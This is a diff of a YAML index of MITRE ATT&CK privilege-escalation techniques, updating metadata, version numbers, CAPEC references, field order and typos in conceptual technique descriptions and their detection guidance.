+ url: https://capec.mitre.org/data/definitions/564.html
- url: http://msdn.microsoft.com/en-us/library/aa376977
description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
12, 2014.
@@ -1137,29 +1149,18 @@ privilege-escalation:
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
source_name: TechNet Autoruns
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Boot or Logon Autostart Execution
- description: |-
- Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
-
- Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.
- id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-06-30T21:23:15.683Z'
+ modified: '2020-10-09T16:05:36.772Z'
created: '2020-01-23T17:46:59.535Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: false
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_detection: "Monitor for additions or modifications of mechanisms that
could be used to trigger autostart execution, such as relevant additions to
the Registry. Look for changes that are not correlated with known updates,
@@ -1178,10 +1179,12 @@ privilege-escalation:
Look for abnormal process behavior that may be due to a process loading a
malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line
parameters involved in kernel modification or driver installation."
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - root
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
atomic_tests: []
T1037:
technique:
@@ -1213,12 +1216,13 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-27T16:49:15.953Z'
+ modified: '2020-08-03T16:47:37.240Z'
created: '2017-05-31T21:30:38.910Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
- macOS
- Windows
+ - Linux
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
or at abnormal times. Look for files added or modified by unusual accounts
outside of normal administration duties. Monitor running process for actions
@@ -1227,7 +1231,7 @@ privilege-escalation:
x_mitre_data_sources:
- File monitoring
- Process monitoring
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
atomic_tests: []
T1548.002:
technique:
@@ -1242,7 +1246,7 @@ privilege-escalation:
* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
- name: Bypass User Access Control
+ name: Bypass User Account Control
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
@@ -1295,7 +1299,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-25T19:57:54.510Z'
+ modified: '2020-07-22T21:36:52.458Z'
created: '2020-01-30T14:24:34.977Z'
x_mitre_platforms:
- Windows
@@ -1322,7 +1326,7 @@ privilege-escalation:
x_mitre_effective_permissions:
- Administrator
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_defense_bypassed:
- Windows User Account Control
identifier: T1548.002
@@ -1546,7 +1550,7 @@ privilege-escalation:
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
- Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
+ Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335
type: attack-pattern
kill_chain_phases:
@@ -1815,6 +1819,15 @@ privilege-escalation:
name: command_prompt
T1078.004:
technique:
+ id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
+ description: |-
+ Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
+
+ Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
+ name: Cloud Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.004
@@ -1831,15 +1844,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
description: Microsoft. (n.d.). Deploying Active Directory Federation Services
in Azure. Retrieved March 13, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Accounts
- description: |-
- Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
-
- Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
- id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -1850,21 +1854,8 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:59:36.729Z'
+ modified: '2020-10-19T16:01:22.090Z'
created: '2020-03-13T20:36:57.378Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
- or malicious activity, such as accessing information outside of the normal
- function of the account or account usage at atypical hours.
- x_mitre_data_sources:
- - Azure activity logs
- - Authentication logs
- - AWS CloudTrail logs
- - Stackdriver logs
x_mitre_platforms:
- AWS
- GCP
@@ -1872,6 +1863,19 @@ privilege-escalation:
- SaaS
- Azure AD
- Office 365
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
+ or malicious behavior, such as accessing information outside of the normal
+ function of the account or account usage at atypical hours.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.1'
atomic_tests: []
T1546.015:
technique:
@@ -2000,34 +2004,6 @@ privilege-escalation:
atomic_tests: []
T1543:
technique:
- created: '2020-01-10T16:03:18.865Z'
- modified: '2020-03-25T22:32:16.537Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- type: attack-pattern
- id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
- description: "Adversaries may create or modify system-level processes to repeatedly
- execute malicious payloads as part of persistence. When operating systems
- boot up, they can start processes that perform background system functions.
- On Windows and Linux, these system processes are referred to as services.
- (Citation: TechNet Services) On macOS, launchd processes known as [Launch
- Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001)
- are run to finish system initialization and load user specific parameters.(Citation:
- AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services,
- daemons, or agents that can be configured to execute at startup or a repeatable
- interval in order to establish persistence. Similarly, adversaries may modify
- existing services, daemons, or agents to achieve the same effect. \n\nServices,
- daemons, or agents may be created with administrator privileges but executed
- under root/SYSTEM privileges. Adversaries may leverage this functionality
- to create or modify system processes in order to escalate privileges. (Citation:
- OSX Malware Detection). "
- name: Create or Modify System Process
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1543
@@ -2043,10 +2019,42 @@ privilege-escalation:
description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical
OS X Malware Detection & Analysis. Retrieved July 10, 2017.'
source_name: OSX Malware Detection
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Create or Modify System Process
+ description: "Adversaries may create or modify system-level processes to repeatedly
+ execute malicious payloads as part of persistence. When operating systems
+ boot up, they can start processes that perform background system functions.
+ On Windows and Linux, these system processes are referred to as services.
+ (Citation: TechNet Services) On macOS, launchd processes known as [Launch
+ Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001)
+ are run to finish system initialization and load user specific parameters.(Citation:
+ AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services,
+ daemons, or agents that can be configured to execute at startup or a repeatable
+ interval in order to establish persistence. Similarly, adversaries may modify
+ existing services, daemons, or agents to achieve the same effect. \n\nServices,
+ daemons, or agents may be created with administrator privileges but executed
+ under root/SYSTEM privileges. Adversaries may leverage this functionality
+ to create or modify system processes in order to escalate privileges. (Citation:
+ OSX Malware Detection). "
+ id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ modified: '2020-10-09T13:46:29.922Z'
+ created: '2020-01-10T16:03:18.865Z'
+ x_mitre_data_sources:
+ - Windows event logs
+ - Windows Registry
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_detection: "Monitor for changes to system processes that do not correlate
with known software, patch cycles, etc., including by comparing results against
a trusted system baseline. New, benign system processes may be created during
@@ -2059,14 +2067,10 @@ privilege-escalation:
process call trees from known services and for execution of other commands
that could relate to Discovery or other adversary techniques. \n\nMonitor
for changes to files associated with system-level processes."
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Windows event logs
- - Windows Registry
- - File monitoring
- - Process command-line parameters
- - Process monitoring
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
atomic_tests: []
T1053.003:
technique:
@@ -2305,9 +2309,9 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1574.002
url: https://attack.mitre.org/techniques/T1574/002
- - external_id: CAPEC-capec
+ - external_id: CAPEC-641
source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
+ url: https://capec.mitre.org/data/definitions/641.html
- source_name: About Side by Side Assemblies
url: https://docs.microsoft.com/en-us/windows/win32/sbscs/about-side-by-side-assemblies-
description: Microsoft. (2018, May 31). About Side-by-Side Assemblies. Retrieved
@@ -2335,7 +2339,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:05:42.513Z'
+ modified: '2020-10-17T15:15:27.807Z'
created: '2020-03-13T19:41:37.908Z'
x_mitre_defense_bypassed:
- Anti-virus
@@ -2394,6 +2398,9 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1078.001
url: https://attack.mitre.org/techniques/T1078/001
+ - external_id: CAPEC-70
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/70.html
- source_name: Microsoft Local Accounts Feb 2019
url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts
description: Microsoft. (2018, December 9). Local Accounts. Retrieved February
@@ -2420,9 +2427,9 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:37:34.567Z'
+ modified: '2020-09-16T19:41:43.491Z'
created: '2020-03-13T20:15:31.974Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
@@ -2473,31 +2480,13 @@ privilege-escalation:
elevation_required: true
T1078.002:
technique:
- created: '2020-03-13T20:21:54.758Z'
- modified: '2020-03-23T21:08:40.063Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- type: attack-pattern
- id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
- description: |-
- Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
-
- Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
- name: Domain Accounts
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.002
url: https://attack.mitre.org/techniques/T1078/002
+ - external_id: CAPEC-560
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/560.html
- url: https://technet.microsoft.com/en-us/library/dn535501.aspx
description: Microsoft. (2016, April 15). Attractive Accounts for Credential
Theft. Retrieved June 3, 2016.
@@ -2510,22 +2499,43 @@ privilege-escalation:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Authentication logs
- - Process monitoring
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Domain Accounts
+ description: |-
+ Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
+
+ Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
+ id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ modified: '2020-09-16T19:42:11.787Z'
+ created: '2020-03-13T20:21:54.758Z'
+ x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1574.004:
technique:
@@ -2544,9 +2554,9 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1574.004
url: https://attack.mitre.org/techniques/T1574/004
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-471
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/471.html
- url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved
July 10, 2017.
@@ -2563,7 +2573,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:06:47.115Z'
+ modified: '2020-09-16T16:48:09.391Z'
created: '2020-03-16T15:23:30.896Z'
x_mitre_platforms:
- macOS
@@ -2584,7 +2594,31 @@ privilege-escalation:
atomic_tests: []
T1055.001:
technique:
- id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
+ created: '2020-01-14T01:26:08.145Z'
+ modified: '2020-06-20T22:17:59.148Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1055.001
+ url: https://attack.mitre.org/techniques/T1055/001
+ - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ source_name: Endgame Process Injection July 2017
+ - url: https://www.endgame.com/blog/technical-blog/hunting-memory
+ description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December
+ 7, 2017.
+ source_name: Endgame HuntingNMemory June 2017
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Dynamic-link Library Injection
description: "Adversaries may inject dynamic-link libraries (DLLs) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
DLL injection is a method of executing arbitrary code in the address space
@@ -2604,35 +2638,17 @@ privilege-escalation:
to the process's memory, system/network resources, and possibly elevated privileges.
Execution via DLL injection may also evade detection from security products
since the execution is masked under a legitimate process. "
- name: Dynamic-link Library Injection
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1055.001
- url: https://attack.mitre.org/techniques/T1055/001
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Endgame Process Injection July 2017
- - url: https://www.endgame.com/blog/technical-blog/hunting-memory
- description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December
- 7, 2017.
- source_name: Endgame HuntingNMemory June 2017
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-06-20T22:17:59.148Z'
- created: '2020-01-14T01:26:08.145Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - DLL monitoring
+ - File monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -2647,16 +2663,10 @@ privilege-escalation:
if a process is performing actions it usually does not, such as opening network
connections, reading files, or other suspicious actions that could relate
to post-compromise behavior. "
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Process monitoring
- - DLL monitoring
- - File monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Application control
- - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1548.004:
technique:
@@ -2815,6 +2825,18 @@ privilege-escalation:
- source_name: mitre-attack
external_id: T1546
url: https://attack.mitre.org/techniques/T1546
+ - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
+ description: Ballenthin, W., et al. (2015). Windows Management Instrumentation
+ (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
+ source_name: FireEye WMI 2015
+ - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf
+ description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite.
+ Retrieved July 10, 2017.
+ source_name: Malware Persistence on OS X
+ - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux
+ Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018.
+ source_name: amnesia malware
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -2826,8 +2848,9 @@ privilege-escalation:
may abuse these mechanisms as a means of maintaining persistent access to
a victim via repeatedly executing malicious code. After gaining access to
a victim system, adversaries may create/modify event triggers to point to
- malicious content that will be executed whenever the event trigger is invoked.
- \n\nSince the execution can be proxied by an account with higher permissions,
+ malicious content that will be executed whenever the event trigger is invoked.(Citation:
+ FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia
+ malware)\n\nSince the execution can be proxied by an account with higher permissions,
such as SYSTEM or service accounts, an adversary may be able to abuse these
triggered execution mechanisms to escalate their privileges. "
id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db
@@ -2837,9 +2860,9 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-07-09T13:55:51.501Z'
+ modified: '2020-10-21T18:48:27.576Z'
created: '2020-01-22T21:04:23.285Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: false
x_mitre_detection: "Monitoring for additions or modifications of mechanisms
that could be used to trigger event-based execution, especially the addition
@@ -2903,7 +2926,7 @@ privilege-escalation:
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
- Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
+ Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979
type: attack-pattern
kill_chain_phases:
@@ -3205,7 +3228,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-26T16:09:59.324Z'
+ modified: '2020-10-17T15:15:28.288Z'
created: '2020-03-12T20:38:12.465Z'
x_mitre_data_sources:
- Environment variable
@@ -3280,11 +3303,11 @@ privilege-escalation:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Image File Execution Options Injection
description: |-
- Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IEFO) debuggers. IEFOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)
+ Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
- IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
+ IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
